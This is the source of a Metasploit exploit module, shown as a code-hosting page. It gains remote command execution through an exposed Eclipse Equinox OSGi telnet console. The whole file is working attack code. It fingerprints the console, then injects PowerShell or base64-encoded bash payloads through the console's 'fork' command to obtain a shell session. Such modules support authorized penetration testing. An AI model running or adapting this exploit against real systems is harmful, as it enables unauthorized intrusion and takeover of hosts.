Path: blob/master/modules/exploits/multi/misc/osgi_console_exec.rb
19591 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##4require 'base64'56class MetasploitModule < Msf::Exploit::Remote7Rank = NormalRanking89include Msf::Exploit::Remote::Tcp10include Msf::Exploit::CmdStager11include Msf::Exploit::Powershell1213TELNET_IAC = Msf::Exploit::Remote::Telnet1415def initialize(info = {})16super(17update_info(18info,19'Name' => 'Eclipse Equinox OSGi Console Command Execution',20'Description' => %q{21Exploit Eclipse Equinox OSGi (Open Service Gateway initiative) console22'fork' command to execute arbitrary commands on the remote system.23},24'Author' => [25'Quentin Kaiser <[email protected]>'26],27'License' => MSF_LICENSE,28'References' => [29['URL', 'https://www.eclipse.org/equinox/documents/quickstart-framework.php']30],31'Platform' => %w{linux win},32'Arch' => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64],33'Targets' => [34[ 'Linux (Bash Payload)', { 'Platform' => 'linux' } ],35[ 'Windows (Powershell Payload)', { 'Platform' => 'win' } ]36],37'CmdStagerFlavor' => [ 'bourne' ],38'DisclosureDate' => '2018-02-13',39'DefaultTarget' => 0,40'Notes' => {41'Reliability' => UNKNOWN_RELIABILITY,42'Stability' => UNKNOWN_STABILITY,43'SideEffects' => UNKNOWN_SIDE_EFFECTS44}45)46)47deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')48register_options([49OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])50])51end5253def check54connect55res = sock.get_once56if res == TELNET_IAC::IAC + TELNET_IAC::WILL + TELNET_IAC::OPT_ECHO + \57TELNET_IAC::IAC + TELNET_IAC::WILL + TELNET_IAC::OPT_SGA + \58TELNET_IAC::IAC + TELNET_IAC::DO + TELNET_IAC::OPT_NAWS + \59TELNET_IAC::IAC + TELNET_IAC::DO + TELNET_IAC::OPT_TTYPE60# terminal type 'xterm-256color' = \x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x7261sock.put(TELNET_IAC::IAC + TELNET_IAC::SB + TELNET_IAC::OPT_TTYPE + \62"\x00xterm-256color" + TELNET_IAC::IAC + TELNET_IAC::SE)63res = sock.get_once64end65disconnect66if res && res == "osgi> "67return Exploit::CheckCode::Vulnerable68end6970Exploit::CheckCode::Safe71end7273def exploit74begin75print_status("Accessing the OSGi console ...")7677unless check == Exploit::CheckCode::Vulnerable78fail_with(Failure::NoTarget, "#{peer} - Failed to access the OSGi console")79end8081if target['Platform'] == "win" then82exec_command("fork \"#{cmd_psh_payload(payload.encoded, payload_instance.arch.first, { encode_final_payload: true, remove_comspec: true })}\"")83else84execute_cmdstager({ :flavor => :bourne })85end8687print_status("#{rhost}:#{rport} - Waiting for session...")8889(datastore['TIME_WAIT']).times do90Rex.sleep(1)91# Success! session is here!92break if session_created?93end94rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e95fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")96ensure97disconnect98end99end100101def exec_command(cmd)102connect103res = sock.get_once104if res == TELNET_IAC::IAC + TELNET_IAC::WILL + TELNET_IAC::OPT_ECHO + \105TELNET_IAC::IAC + TELNET_IAC::WILL + TELNET_IAC::OPT_SGA + \106TELNET_IAC::IAC + TELNET_IAC::DO + TELNET_IAC::OPT_NAWS + \107TELNET_IAC::IAC + TELNET_IAC::DO + TELNET_IAC::OPT_TTYPE108sock.put(TELNET_IAC::IAC + TELNET_IAC::SB + TELNET_IAC::OPT_TTYPE + \109"\x00xterm-256color" + TELNET_IAC::IAC + TELNET_IAC::SE)110res = sock.get_once111end112print_status("Exploiting...")113sock.put("#{cmd}\r\n")114res = sock.get115sock.put("disconnect\r\n")116res = sock.get117sock.put("y\r\n")118end119120def execute_command(cmd, opts = {})121cmd_b64 = Base64.encode64(cmd).gsub(/\s+/, "")122# Runtime.getRuntime().exec() workaround on Linux. Requires bash.123exec_command("fork \"bash -c {echo,#{cmd_b64}}|{base64,-d}|{bash,-i}\"")124end125end126127128